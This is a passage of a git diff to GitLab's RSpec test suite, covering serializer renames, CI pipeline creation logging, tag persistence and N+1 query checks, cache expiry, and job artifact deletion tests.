test', testcase: 'https://gitlab.com/gitlab-org/gitlab/-/quality/test_cases/348312' do + end + RUBY + end + end +end diff --git a/spec/rubocop/cop/static_translation_definition_spec.rb b/spec/rubocop/cop/static_translation_definition_spec.rb index b2b04cbcbde..554a7c17a4b 100644 --- a/spec/rubocop/cop/static_translation_definition_spec.rb +++ b/spec/rubocop/cop/static_translation_definition_spec.rb @@ -112,7 +112,7 @@ RSpec.describe RuboCop::Cop::StaticTranslationDefinition do } end CODE - <<~CODE + <<~CODE, class MyClass def hello { @@ -121,6 +121,20 @@ RSpec.describe RuboCop::Cop::StaticTranslationDefinition do end end CODE + <<~CODE, + SomeClass = Struct.new do + def text + _('Some translated text') + end + end + CODE + <<~CODE + Struct.new('SomeClass') do + def text + _('Some translated text') + end + end + CODE ] end diff --git a/spec/serializers/build_details_entity_spec.rb b/spec/serializers/build_details_entity_spec.rb index 8a63715ed86..a24841fe286 100644 --- a/spec/serializers/build_details_entity_spec.rb +++ b/spec/serializers/build_details_entity_spec.rb @@ -5,8 +5,8 @@ require 'spec_helper' RSpec.describe BuildDetailsEntity do include ProjectForksHelper - it 'inherits from JobEntity' do - expect(described_class).to be < JobEntity + it 'inherits from Ci::JobEntity' do + expect(described_class).to be < Ci::JobEntity end describe '#as_json' do @@ -29,7 +29,7 @@ RSpec.describe BuildDetailsEntity do end it 'contains the needed key value pairs' do - expect(subject).to include(:coverage, :erased_at, :duration) + expect(subject).to include(:coverage, :erased_at, :finished_at, :duration) expect(subject).to include(:runner, :pipeline) expect(subject).to include(:raw_path, :new_issue_path) end diff --git a/spec/serializers/job_entity_spec.rb b/spec/serializers/ci/job_entity_spec.rb index f31cfcb8499..ba68b9a6c16 100644 --- a/spec/serializers/job_entity_spec.rb +++ b/spec/serializers/ci/job_entity_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe JobEntity do +RSpec.describe Ci::JobEntity do let(:user) { create(:user) } let(:job) { create(:ci_build) } let(:project) { job.project } diff --git a/spec/serializers/build_serializer_spec.rb b/spec/serializers/ci/job_serializer_spec.rb index f3584beb39b..d47c9fdbf24 100644 --- a/spec/serializers/build_serializer_spec.rb +++ b/spec/serializers/ci/job_serializer_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe BuildSerializer do +RSpec.describe Ci::JobSerializer do let(:user) { create(:user) } let(:serializer) do diff --git a/spec/serializers/ci/pipeline_entity_spec.rb b/spec/serializers/ci/pipeline_entity_spec.rb index f79bbd91a0a..4d9ed9fc22f 100644 --- a/spec/serializers/ci/pipeline_entity_spec.rb +++ b/spec/serializers/ci/pipeline_entity_spec.rb @@ -260,5 +260,17 @@ RSpec.describe Ci::PipelineEntity do end end end + + context 'when pipeline has coverage' do + let_it_be(:pipeline) { create(:ci_pipeline, project: project, user: user) } + + before do + allow(pipeline).to receive(:coverage).and_return(35.0) + end + + it 'exposes the coverage' do + expect(subject[:coverage]).to eq('35.00') + end + end end end diff --git a/spec/serializers/deployment_entity_spec.rb b/spec/serializers/deployment_entity_spec.rb index 588675f5232..1dacc9513ee 100644 --- a/spec/serializers/deployment_entity_spec.rb +++ b/spec/serializers/deployment_entity_spec.rb @@ -42,6 +42,10 @@ RSpec.describe DeploymentEntity do expect(subject).to include(:deployed_at) end + it 'exposes last? as is_last' do + expect(subject).to include(:is_last) + end + context 'when deployable is nil' do let(:entity) { described_class.new(deployment, request: request, deployment_details: false) } let(:deployment) { create(:deployment, deployable: nil, project: project) } diff --git a/spec/serializers/merge_request_widget_entity_spec.rb b/spec/serializers/merge_request_widget_entity_spec.rb index 3e0c61a26c0..1712df6266c 100644 --- a/spec/serializers/merge_request_widget_entity_spec.rb +++ b/spec/serializers/merge_request_widget_entity_spec.rb @@ -252,7 +252,7 @@ RSpec.describe MergeRequestWidgetEntity do subject { described_class.new(resource, request: request).as_json } it 'provides a valid path value for user callout path' do - expect(subject[:user_callouts_path]).to eq '/-/user_callouts' + expect(subject[:user_callouts_path]).to eq '/-/users/callouts' end it 'provides a valid value for suggest pipeline feature id' do @@ -362,7 +362,7 @@ RSpec.describe MergeRequestWidgetEntity do context 'when suggest pipeline has been dismissed' do before do - create(:user_callout, user: user, feature_name: described_class::SUGGEST_PIPELINE) + create(:callout, user: user, feature_name: described_class::SUGGEST_PIPELINE) end it 'is true' do diff --git a/spec/serializers/merge_requests/pipeline_entity_spec.rb b/spec/serializers/merge_requests/pipeline_entity_spec.rb index 6970b547f12..ee99ab2e7dd 100644 --- a/spec/serializers/merge_requests/pipeline_entity_spec.rb +++ b/spec/serializers/merge_requests/pipeline_entity_spec.rb @@ -14,6 +14,7 @@ RSpec.describe MergeRequests::PipelineEntity do allow(request).to receive(:current_user).and_return(user) allow(request).to receive(:project).and_return(project) + allow(pipeline).to receive(:coverage).and_return(35.0) end let(:entity) do @@ -35,6 +36,10 @@ RSpec.describe MergeRequests::PipelineEntity do expect(subject[:flags]).to include(:merge_request_pipeline) end + it 'returns presented coverage' do + expect(subject[:coverage]).to eq('35.00') + end + it 'excludes coverage data when disabled' do entity = described_class .represent(pipeline, request: request, disable_coverage: true) diff --git a/spec/services/authorized_project_update/find_records_due_for_refresh_service_spec.rb b/spec/services/authorized_project_update/find_records_due_for_refresh_service_spec.rb index 8a53d9fbf7c..c6b184bd003 100644 --- a/spec/services/authorized_project_update/find_records_due_for_refresh_service_spec.rb +++ b/spec/services/authorized_project_update/find_records_due_for_refresh_service_spec.rb @@ -59,7 +59,9 @@ RSpec.describe AuthorizedProjectUpdate::FindRecordsDueForRefreshService do .create!(project: project2, access_level: Gitlab::Access::MAINTAINER) to_be_removed = [project2.id] - to_be_added = [[user.id, project.id, Gitlab::Access::MAINTAINER]] + to_be_added = [ + { user_id: user.id, project_id: project.id, access_level: Gitlab::Access::MAINTAINER } + ] expect(service.execute).to eq([to_be_removed, to_be_added]) end @@ -70,7 +72,9 @@ RSpec.describe AuthorizedProjectUpdate::FindRecordsDueForRefreshService do end to_be_removed = [project.id] - to_be_added = [[user.id, project.id, Gitlab::Access::MAINTAINER]] + to_be_added = [ + { user_id: user.id, project_id: project.id, access_level: Gitlab::Access::MAINTAINER } + ] expect(service.execute).to eq([to_be_removed, to_be_added]) end @@ -80,7 +84,9 @@ RSpec.describe AuthorizedProjectUpdate::FindRecordsDueForRefreshService do .create!(project: project, access_level: Gitlab::Access::DEVELOPER) to_be_removed = [project.id] - to_be_added = [[user.id, project.id, Gitlab::Access::MAINTAINER]] + to_be_added = [ + { user_id: user.id, project_id: project.id, access_level: Gitlab::Access::MAINTAINER } + ] expect(service.execute).to eq([to_be_removed, to_be_added]) end diff --git a/spec/services/bulk_imports/tree_export_service_spec.rb b/spec/services/bulk_imports/tree_export_service_spec.rb index f2ed747b64e..ffb81fe2b5f 100644 --- a/spec/services/bulk_imports/tree_export_service_spec.rb +++ b/spec/services/bulk_imports/tree_export_service_spec.rb @@ -5,7 +5,8 @@ require 'spec_helper' RSpec.describe BulkImports::TreeExportService do let_it_be(:project) { create(:project) } let_it_be(:export_path) { Dir.mktmpdir } - let_it_be(:relation) { 'issues' } + + let(:relation) { 'issues' } subject(:service) { described_class.new(project, export_path, relation) } @@ -25,11 +26,31 @@ RSpec.describe BulkImports::TreeExportService do expect { service.execute }.to raise_error(BulkImports::Error, 'Unsupported relation export type') end end + + context 'when relation is self' do + let(:relation) { 'self' } + + it 'executes export on portable itself' do + expect_next_instance_of(Gitlab::ImportExport::Json::StreamingSerializer) do |serializer| + expect(serializer).to receive(:serialize_root) + end + + subject.execute + end + end end describe '#exported_filename' do it 'returns filename of the exported file' do expect(subject.exported_filename).to eq('issues.ndjson') end + + context 'when relation is self' do + let(:relation) { 'self' } + + it 'returns filename of the exported file' do + expect(subject.exported_filename).to eq('self.json') + end + end end end diff --git a/spec/services/bulk_imports/uploads_export_service_spec.rb b/spec/services/bulk_imports/uploads_export_service_spec.rb new file mode 100644 index 00000000000..39bcacfdc5e --- /dev/null +++ b/spec/services/bulk_imports/uploads_export_service_spec.rb @@ -0,0 +1,24 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::UploadsExportService do + let_it_be(:project) { create(:project, avatar: fixture_file_upload('spec/fixtures/rails_sample.png', 'image/png')) } + let_it_be(:upload) { create(:upload, :with_file, :issuable_upload, uploader: FileUploader, model: project) } + let_it_be(:export_path) { Dir.mktmpdir } + + subject(:service) { described_class.new(project, export_path) } + + after do + FileUtils.remove_entry(export_path) if Dir.exist?(export_path) + end + + describe '#execute' do + it 'exports project uploads and avatar' do + subject.execute + + expect(File.exist?(File.join(export_path, 'avatar', 'rails_sample.png'))).to eq(true) + expect(File.exist?(File.join(export_path, upload.secret, upload.retrieve_uploader.filename))).to eq(true) + end + end +end diff --git a/spec/services/ci/create_pipeline_service/logger_spec.rb b/spec/services/ci/create_pipeline_service/logger_spec.rb new file mode 100644 index 00000000000..dfe0859015d --- /dev/null +++ b/spec/services/ci/create_pipeline_service/logger_spec.rb @@ -0,0 +1,139 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Ci::CreatePipelineService do + context 'pipeline logger' do + let_it_be(:project) { create(:project, :repository) } + let_it_be(:user) { project.owner } + + let(:ref) { 'refs/heads/master' } + let(:service) { described_class.new(project, user, { ref: ref }) } + let(:pipeline) { service.execute(:push).payload } + let(:file_location) { 'spec/fixtures/gitlab/ci/external_files/.gitlab-ci-template-1.yml' } + + before do + stub_ci_pipeline_yaml_file(gitlab_ci_yaml) + end + + let(:counters) do + { + 'count' => a_kind_of(Numeric), + 'avg' => a_kind_of(Numeric), + 'max' => a_kind_of(Numeric), + 'min' => a_kind_of(Numeric) + } + end + + let(:loggable_data) do + { + 'pipeline_creation_caller' => 'Ci::CreatePipelineService', + 'pipeline_source' => 'push', + 'pipeline_id' => a_kind_of(Numeric), + 'pipeline_persisted' => true, + 'project_id' => project.id, + 'pipeline_creation_service_duration_s' => a_kind_of(Numeric), + 'pipeline_creation_duration_s' => counters, + 'pipeline_size_count' => counters, + 'pipeline_step_gitlab_ci_pipeline_chain_seed_duration_s' => counters + } + end + + context 'when the duration is under the threshold' do + it 'does not create a log entry but it collects the data' do + expect(Gitlab::AppJsonLogger).not_to receive(:info) + expect(pipeline).to be_created_successfully + + expect(service.logger.observations_hash) + .to match( + a_hash_including( + 'pipeline_creation_duration_s' => counters, + 'pipeline_size_count' => counters, + 'pipeline_step_gitlab_ci_pipeline_chain_seed_duration_s' => counters + ) + ) + end + end + + context 'when the durations exceeds the threshold' do + let(:timer) do + proc do + @timer = @timer.to_i + 30 + end + end + + before do + allow(Gitlab::Ci::Pipeline::Logger) + .to receive(:current_monotonic_time) { timer.call } + end + + it 'creates a log entry' do + expect(Gitlab::AppJsonLogger) + .to receive(:info) + .with(a_hash_including(loggable_data)) + .and_call_original + + expect(pipeline).to be_created_successfully + end + + context 'when the pipeline is not persisted' do + let(:loggable_data) do + { + 'pipeline_creation_caller' => 'Ci::CreatePipelineService', + 'pipeline_source' => 'push', + 'pipeline_id' => nil, + 'pipeline_persisted' => false, + 'project_id' => project.id, + 'pipeline_creation_service_duration_s' => a_kind_of(Numeric), + 'pipeline_step_gitlab_ci_pipeline_chain_seed_duration_s' => counters + } + end + + before do + allow_next_instance_of(Ci::Pipeline) do |pipeline| + expect(pipeline).to receive(:save!).and_raise { RuntimeError } + end + end + + it 'creates a log entry' do + expect(Gitlab::AppJsonLogger) + .to receive(:info) + .with(a_hash_including(loggable_data)) + .and_call_original + + expect { pipeline }.to raise_error(RuntimeError) + end + end + + context 'when the feature flag is disabled' do + before do + stub_feature_flags(ci_pipeline_creation_logger: false) + end + + it 'does not create a log entry' do + expect(Gitlab::AppJsonLogger).not_to receive(:info) + + expect(pipeline).to be_created_successfully + expect(service.logger.observations_hash).to eq({}) + end + end + end + + context 'when the size exceeds the threshold' do + before do + allow_next_instance_of(Ci::Pipeline) do |pipeline| + allow(pipeline).to receive(:total_size) { 5000 } + end + end + + it 'creates a log entry' do + expect(Gitlab::AppJsonLogger) + .to receive(:info) + .with(a_hash_including(loggable_data)) + .and_call_original + + expect(pipeline).to be_created_successfully + end + end + end +end diff --git a/spec/services/ci/create_pipeline_service/tags_spec.rb b/spec/services/ci/create_pipeline_service/tags_spec.rb index 335d35010c8..cbbeb870c5f 100644 --- a/spec/services/ci/create_pipeline_service/tags_spec.rb +++ b/spec/services/ci/create_pipeline_service/tags_spec.rb @@ -7,16 +7,15 @@ RSpec.describe Ci::CreatePipelineService do let_it_be(:user) { project.owner } let(:ref) { 'refs/heads/master' } - let(:source) { :push } let(:service) { described_class.new(project, user, { ref: ref }) } - let(:pipeline) { service.execute(source).payload } + let(:pipeline) { create_pipeline } before do - stub_ci_pipeline_yaml_file(config) + stub_yaml_config(config) end context 'with valid config' do - let(:config) { YAML.dump({ test: { script: 'ls', tags: %w[tag1 tag2] } }) } + let(:config) { { test: { script: 'ls', tags: %w[tag1 tag2] } } } it 'creates a pipeline', :aggregate_failures do expect(pipeline).to be_created_successfully @@ -25,8 +24,8 @@ RSpec.describe Ci::CreatePipelineService do end context 'with too many tags' do - let(:tags) { Array.new(50) {|i| "tag-#{i}" } } - let(:config) { YAML.dump({ test: { script: 'ls', tags: tags } }) } + let(:tags) { build_tag_list(label: 'custom', size: 50) } + let(:config) { { test: { script: 'ls', tags: tags } } } it 'creates a pipeline without builds', :aggregate_failures do expect(pipeline).not_to be_created_successfully @@ -34,5 +33,167 @@ RSpec.describe Ci::CreatePipelineService do expect(pipeline.yaml_errors).to eq("jobs:test:tags config must be less than the limit of #{Gitlab::Ci::Config::Entry::Tags::TAGS_LIMIT} tags") end end + + context 'tags persistence' do + let(:config) do + { + build: { + script: 'ls', + stage: 'build', + tags: build_tag_list(label: 'build') + }, + test: { + script: 'ls', + stage: 'test', + tags: build_tag_list(label: 'test') + } + } + end + + let(:config_without_tags) do + config.transform_values { |job| job.except(:tags) } + end + + context 'with multiple tags' do + context 'when the tags do not exist' do + it 'does not execute N+1 queries' do + stub_yaml_config(config_without_tags) + + # warm up the cached objects so we get a more accurate count + create_pipeline + + control = ActiveRecord::QueryRecorder.new(skip_cached: false) do + create_pipeline + end + + stub_yaml_config(config) + + # 2 select tags.* + # 1 insert tags + # 1 insert taggings + tags_queries_size = 4 + + expect { pipeline } + .not_to exceed_all_query_limit(control) + .with_threshold(tags_queries_size) + + expect(pipeline).to be_created_successfully + end + end + + context 'when the feature flag is disabled' do + before do + stub_feature_flags(ci_bulk_insert_tags: false) + end + + it 'executes N+1s queries' do + stub_yaml_config(config_without_tags) + + # warm up the cached objects so we get a more accurate count + create_pipeline + + control = ActiveRecord::QueryRecorder.new(skip_cached: false) do + create_pipeline + end + + stub_yaml_config(config) + + expect { pipeline } + .to exceed_all_query_limit(control) + .with_threshold(4) + + expect(pipeline).to be_created_successfully + end + end + + context 'when tags are already persisted' do + it 'does not execute N+1 queries' do + # warm up the cached objects so we get a more accurate count + # and insert the tags + create_pipeline + + control = ActiveRecord::QueryRecorder.new(skip_cached: false) do + create_pipeline + end + + # 1 select tags.* + # 1 insert taggings + tags_queries_size = 2 + + expect { pipeline } + .not_to exceed_all_query_limit(control) + .with_threshold(tags_queries_size) + + expect(pipeline).to be_created_successfully + end + end + end + + context 'with bridge jobs' do + let(:config) do + { + test_1: { + script: 'ls', + stage: 'test', + tags: build_tag_list(label: 'test_1') + }, + test_2: { + script: 'ls', + stage: 'test', + tags: build_tag_list(label: '$CI_JOB_NAME') + }, + test_3: { + script: 'ls', + stage: 'test', + tags: build_tag_list(label: 'test_1') + build_tag_list(label: 'test_2') + }, + test_4: { + script: 'ls', + stage: 'test' + }, + deploy: { + stage: 'deploy', + trigger: 'my/project' + } + } + end + + it do + expect(pipeline).to be_created_successfully + expect(pipeline.bridges.size).to eq(1) + expect(pipeline.builds.size).to eq(4) + + expect(tags_for('test_1')) + .to have_attributes(count: 5) + .and all(match(/test_1-tag-\d+/)) + + expect(tags_for('test_2')) + .to have_attributes(count: 5) + .and all(match(/test_2-tag-\d+/)) + + expect(tags_for('test_3')) + .to have_attributes(count: 10) + .and all(match(/test_[1,2]-tag-\d+/)) + + expect(tags_for('test_4')).to be_empty + end + end + end + end + + def tags_for(build_name) + pipeline.builds.find_by_name(build_name).tag_list + end + + def stub_yaml_config(config) + stub_ci_pipeline_yaml_file(YAML.dump(config)) + end + + def create_pipeline + service.execute(:push).payload + end + + def build_tag_list(label:, size: 5) + Array.new(size) { |index| "#{label}-tag-#{index}" } end end diff --git a/spec/services/ci/create_pipeline_service_spec.rb b/spec/services/ci/create_pipeline_service_spec.rb index c78e19ea62d..ef879d536c3 100644 --- a/spec/services/ci/create_pipeline_service_spec.rb +++ b/spec/services/ci/create_pipeline_service_spec.rb @@ -46,6 +46,47 @@ RSpec.describe Ci::CreatePipelineService do end # rubocop:enable Metrics/ParameterLists + context 'performance' do + it_behaves_like 'pipelines are created without N+1 SQL queries' do + let(:config1) do + <<~YAML + job1: + stage: build + script: exit 0 + + job2: + stage: test + script: exit 0 + YAML + end + + let(:config2) do + <<~YAML + job1: + stage: build + script: exit 0 + + job2: + stage: test + script: exit 0 + + job3: + stage: deploy + script: exit 0 + YAML + end + + let(:accepted_n_plus_ones) do + 1 + # SELECT "ci_instance_variables" + 1 + # INSERT INTO "ci_stages" + 1 + # SELECT "ci_builds".* FROM "ci_builds" + 1 + # INSERT INTO "ci_builds" + 1 + # INSERT INTO "ci_builds_metadata" + 1 # SELECT "taggings".* FROM "taggings" + end + end + end + context 'valid params' do let(:pipeline) { execute_service.payload } @@ -1951,6 +1992,75 @@ RSpec.describe Ci::CreatePipelineService do let(:rules_job) { find_job('rules-job') } let(:delayed_job) { find_job('delayed-job') } + context 'with when:manual' do + let(:config) do + <<-EOY + job-with-rules: + script: 'echo hey' + rules: + - if: $CI_COMMIT_REF_NAME =~ /master/ + + job-when-with-rules: + script: 'echo hey' + when: manual + rules: + - if: $CI_COMMIT_REF_NAME =~ /master/ + + job-when-with-rules-when: + script: 'echo hey' + when: manual + rules: + - if: $CI_COMMIT_REF_NAME =~ /master/ + when: on_success + + job-with-rules-when: + script: 'echo hey' + rules: + - if: $CI_COMMIT_REF_NAME =~ /master/ + when: manual + + job-without-rules: + script: 'echo this is a job with NO rules' + EOY + end + + let(:job_with_rules) { find_job('job-with-rules') } + let(:job_when_with_rules) { find_job('job-when-with-rules') } + let(:job_when_with_rules_when) { find_job('job-when-with-rules-when') } + let(:job_with_rules_when) { find_job('job-with-rules-when') } + let(:job_without_rules) { find_job('job-without-rules') } + + context 'when matching the rules' do + let(:ref_name) { 'refs/heads/master' } + + it 'adds the job-with-rules with a when:manual' do + expect(job_with_rules).to be_persisted + expect(job_when_with_rules).to be_persisted + expect(job_when_with_rules_when).to be_persisted + expect(job_with_rules_when).to be_persisted + expect(job_without_rules).to be_persisted + + expect(job_with_rules.when).to eq('on_success') + expect(job_when_with_rules.when).to eq('manual') + expect(job_when_with_rules_when.when).to eq('on_success') + expect(job_with_rules_when.when).to eq('manual') + expect(job_without_rules.when).to eq('on_success') + end + end + + context 'when there is no match to the rule' do + let(:ref_name) { 'refs/heads/wip' } + + it 'does not add job_with_rules' do + expect(job_with_rules).to be_nil + expect(job_when_with_rules).to be_nil + expect(job_when_with_rules_when).to be_nil + expect(job_with_rules_when).to be_nil + expect(job_without_rules).to be_persisted + end + end + end + shared_examples 'rules jobs are excluded' do it 'only persists the job without rules' do expect(pipeline).to be_persisted diff --git a/spec/services/ci/expire_pipeline_cache_service_spec.rb b/spec/services/ci/expire_pipeline_cache_service_spec.rb index 613bbe45e68..8cfe756faf3 100644 --- a/spec/services/ci/expire_pipeline_cache_service_spec.rb +++ b/spec/services/ci/expire_pipeline_cache_service_spec.rb @@ -16,14 +16,16 @@ RSpec.describe Ci::ExpirePipelineCacheService do pipeline_path = "/#{project.full_path}/-/pipelines/#{pipeline.id}.json" graphql_pipeline_path = "/api/graphql:pipelines/id/#{pipeline.id}" graphql_pipeline_sha_path = "/api/graphql:pipelines/sha/#{pipeline.sha}" + graphql_project_on_demand_scan_counts_path = "/api/graphql:on_demand_scan/counts/#{project.full_path}" - expect_next_instance_of(Gitlab::EtagCaching::Store) do |store| - expect(store).to receive(:touch).with(pipelines_path) - expect(store).to receive(:touch).with(new_mr_pipelines_path) - expect(store).to receive(:touch).with(pipeline_path) - expect(store).to receive(:touch).with(graphql_pipeline_path) - expect(store).to receive(:touch).with(graphql_pipeline_sha_path) - end + expect_touched_etag_caching_paths( + pipelines_path, + new_mr_pipelines_path, + pipeline_path, + graphql_pipeline_path, + graphql_pipeline_sha_path, + graphql_project_on_demand_scan_counts_path + ) subject.execute(pipeline) end @@ -35,9 +37,10 @@ RSpec.describe Ci::ExpirePipelineCacheService do merge_request_pipelines_path = "/#{project.full_path}/-/merge_requests/#{merge_request.iid}/pipelines.json" merge_request_widget_path = "/#{project.full_path}/-/merge_requests/#{merge_request.iid}/cached_widget.json" - allow_any_instance_of(Gitlab::EtagCaching::Store).to receive(:touch) - expect_any_instance_of(Gitlab::EtagCaching::Store).to receive(:touch).with(merge_request_pipelines_path) - expect_any_instance_of(Gitlab::EtagCaching::Store).to receive(:touch).with(merge_request_widget_path) + expect_touched_etag_caching_paths( + merge_request_pipelines_path, + merge_request_widget_path + ) subject.execute(merge_request.all_pipelines.last) end @@ -76,10 +79,7 @@ RSpec.describe Ci::ExpirePipelineCacheService do it 'updates the cache of dependent pipeline' do dependent_pipeline_path = "/#{source.source_project.full_path}/-/pipelines/#{source.source_pipeline.id}.json" - expect_next_instance_of(Gitlab::EtagCaching::Store) do |store| - allow(store).to receive(:touch) - expect(store).to receive(:touch).with(dependent_pipeline_path) - end + expect_touched_etag_caching_paths(dependent_pipeline_path) subject.execute(pipeline) end @@ -92,13 +92,31 @@ RSpec.describe Ci::ExpirePipelineCacheService do it 'updates the cache of dependent pipeline' do dependent_pipeline_path = "/#{source.project.full_path}/-/pipelines/#{source.pipeline.id}.json" - expect_next_instance_of(Gitlab::EtagCaching::Store) do |store| - allow(store).to receive(:touch) - expect(store).to receive(:touch).with(dependent_pipeline_path) - end + expect_touched_etag_caching_paths(dependent_pipeline_path) subject.execute(pipeline) end end + + it 'does not do N+1 queries' do + subject.execute(pipeline) + + control = ActiveRecord::QueryRecorder.new { subject.execute(pipeline) } + + create(:ci_sources_pipeline, pipeline: pipeline) + create(:ci_sources_pipeline, source_job: create(:ci_build, pipeline: pipeline)) + + expect { subject.execute(pipeline) }.not_to exceed_query_limit(control.count) + end + end + + def expect_touched_etag_caching_paths(*paths) + expect_next_instance_of(Gitlab::EtagCaching::Store) do |store| + expect(store).to receive(:touch).and_wrap_original do |m, *args| + expect(args).to include(*paths) + + m.call(*args) + end + end end end diff --git a/spec/services/ci/generate_terraform_reports_service_spec.rb b/spec/services/ci/generate_terraform_reports_service_spec.rb index c9ac74e050c..c32e8bcaeb8 100644 --- a/spec/services/ci/generate_terraform_reports_service_spec.rb +++ b/spec/services/ci/generate_terraform_reports_service_spec.rb @@ -23,7 +23,7 @@ RSpec.describe Ci::GenerateTerraformReportsService do 'create' => 0, 'delete' => 0, 'update' => 1, - 'job_name' => build.options.dig(:artifacts, :name).to_s + 'job_name' => build.name )) ), key: an_instance_of(Array) diff --git a/spec/services/ci/job_artifacts/destroy_all_expired_service_spec.rb b/spec/services/ci/job_artifacts/destroy_all_expired_service_spec.rb index 6761f052e18..e71f1a4266a 100644 --- a/spec/services/ci/job_artifacts/destroy_all_expired_service_spec.rb +++ b/spec/services/ci/job_artifacts/destroy_all_expired_service_spec.rb @@ -53,6 +53,46 @@ RSpec.describe Ci::JobArtifacts::DestroyAllExpiredService, :clean_gitlab_redis_s log = ActiveRecord::QueryRecorder.new { subject } expect(log.count).to be_within(1).of(8) end + + context 'with several locked-unknown artifact records' do + before do + stub_const("#{described_class}::LOOP_LIMIT", 10) + stub_const("#{described_class}::BATCH_SIZE", 2) + end + + let!(:lockable_artifact_records) do + [ + create(:ci_job_artifact, :metadata, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: locked_job), + create(:ci_job_artifact, :junit, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: locked_job), + create(:ci_job_artifact, :sast, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: locked_job), + create(:ci_job_artifact, :cobertura, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: locked_job), + create(:ci_job_artifact, :trace, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: locked_job) + ] + end + + let!(:unlockable_artifact_records) do + [ + create(:ci_job_artifact, :metadata, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: job), + create(:ci_job_artifact, :junit, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: job), + create(:ci_job_artifact, :sast, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: job), + create(:ci_job_artifact, :cobertura, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: job), + create(:ci_job_artifact, :trace, :expired, locked: ::Ci::JobArtifact.lockeds[:unknown], job: job), + artifact + ] + end + + it 'updates the locked status of job artifacts from artifacts-locked pipelines' do + subject + + expect(lockable_artifact_records).to be_all(&:persisted?) + expect(lockable_artifact_records).to be_all { |artifact| artifact.reload.artifact_artifacts_locked? } + end + + it 'unlocks and then destroys job artifacts from artifacts-unlocked pipelines' do + expect { subject }.to change { Ci::JobArtifact.count }.by(-6) + expect(Ci::JobArtifact.where(id: unlockable_artifact_records.map(&:id))).to be_empty + end + end end end diff --git a/spec/services/ci/job_artifacts/destroy_batch_service_spec.rb b/spec/services/ci/job_artifacts/destroy_batch_service_spec.rb index 1cc856734fc..0e7230c042e 100644 --- a/spec/services/ci/job_artifacts/destroy_batch_service_spec.rb +++ b/spec/services/ci/job_artifacts/destroy_batch_service_spec.rb @@ -3,59 +3,74 @@ require 'spec_helper' RSpec.describe Ci::JobArtifacts::DestroyBatchService do - let(:artifacts) { Ci::JobArtifact.all } + let(:artifacts) { Ci::JobArtifact.where(id: [artifact_with_file.id, artifact_without_file.id]) } let(:service) { described_class.new(artifacts, pick_up_at: Time.current) } + let_it_be(:artifact_with_file, refind: true) do + create(:ci_job_artifact, :zip) + end + + let_it_be(:artifact_without_file, refind: true) do + create(:ci_job_artifact) + end + + let_it_be(:undeleted_artifact, refind: true) do + create(:ci_job_artifact) + end + describe '.execute' do subject(:execute) { service.execute } - let_it_be(:artifact, refind: true) do - create(:ci_job_artifact) + it 'creates a deleted object for artifact with attached file' do + expect { subject }.to change { Ci::DeletedObject.count }.by(1) end - context 'when the artifact has a file attached to it' do - before do - artifact.file = fixture_file_upload(Rails.root.join('spec/fixtures/ci_build_artifacts.zip'), 'application/zip') - artifact.save! - end + it 'does not remove the attached file' do + expect { execute }.not_to change { artifact_with_file.file.exists? } + end - it 'creates a deleted object' do - expect { subject }.to change { Ci::DeletedObject.count }.by(1) - end + it 'deletes the artifact records' do + expect { subject }.to change { Ci::JobArtifact.count }.by(-2) + end - it 'does not remove the files' do - expect { execute }.not_to change { artifact.file.exists? } + it 'reports metrics for destroyed artifacts' do + expect_next_instance_of(Gitlab::Ci::Artifacts::Metrics) do |metrics| + expect(metrics).to receive(:increment_destroyed_artifacts_count).with(2).and_call_original + expect(metrics).to receive(:increment_destroyed_artifacts_bytes).with(107464).and_call_original end - it 'reports metrics for destroyed artifacts' do - expect_next_instance_of(Gitlab::Ci::Artifacts::Metrics) do |metrics| - expect(metrics).to receive(:increment_destroyed_artifacts_count).with(1).and_call_original - expect(metrics).to receive(:increment_destroyed_artifacts_bytes).with(107464).and_call_original - end + execute + end + + context 'ProjectStatistics' do + it 'resets project statistics' do + expect(ProjectStatistics).to receive(:increment_statistic).once + .with(artifact_with_file.project, :build_artifacts_size, -artifact_with_file.file.size) + .and_call_original + expect(ProjectStatistics).to receive(:increment_statistic).once + .with(artifact_without_file.project, :build_artifacts_size, 0) + .and_call_original execute end - context 'ProjectStatistics' do - it 'resets project statistics' do - expect(ProjectStatistics).to receive(:increment_statistic).once - .with(artifact.project, :build_artifacts_size, -artifact.file.size) - .and_call_original + context 'with update_stats: false' do + it 'does not update project statistics' do + expect(ProjectStatistics).not_to receive(:increment_statistic) - execute + service.execute(update_stats: false) end - context 'with update_stats: false' do - it 'does not update project statistics' do - expect(ProjectStatistics).not_to receive(:increment_statistic) - - service.execute(update_stats: false) - end + it 'returns size statistics' do + expected_updates = { + statistics_updates: { + artifact_with_file.project => -artifact_with_file.file.size, + artifact_without_file.project => 0 + } + } - it 'returns size statistics' do - expect(service.execute(update_stats: false)).to match( - a_hash_including(statistics_updates: { artifact.project => -artifact.file.size })) - end + expect(service.execute(update_stats: false)).to match( + a_hash_including(expected_updates)) end end end @@ -71,7 +86,7 @@ RSpec.describe Ci::JobArtifacts::DestroyBatchService do it 'raises an exception and stop destroying' do expect { execute }.to raise_error(ActiveRecord::RecordNotDestroyed) - .and not_change { Ci::JobArtifact.count }.from(1) + .and not_change { Ci::JobArtifact.count } end end end diff --git a/spec/services/ci/parse_dotenv_artifact_service_spec.rb b/spec/services/ci/parse_dotenv_artifact_service_spec.rb index c4040a426f2..6bf22b7c8b2 100644 --- a/spec/services/ci/parse_dotenv_artifact_service_spec.rb +++ b/spec/services/ci/parse_dotenv_artifact_service_spec.rb @@ -23,6 +23,46 @@ RSpec.describe Ci::ParseDotenvArtifactService do hash_including('key' => 'KEY2', 'value' => 'VAR2')) end + context 'when dotenv variables are conflicting against manual variables' do + before do + create(:ci_job_variable, job: build, key: 'KEY1') + end + + it 'returns an error message that there is a duplicate variable' do + subject + + expect(subject[:status]).to eq(:error) + expect(subject[:message]).to include("Key (key, job_id)=(KEY1, #{build.id}) 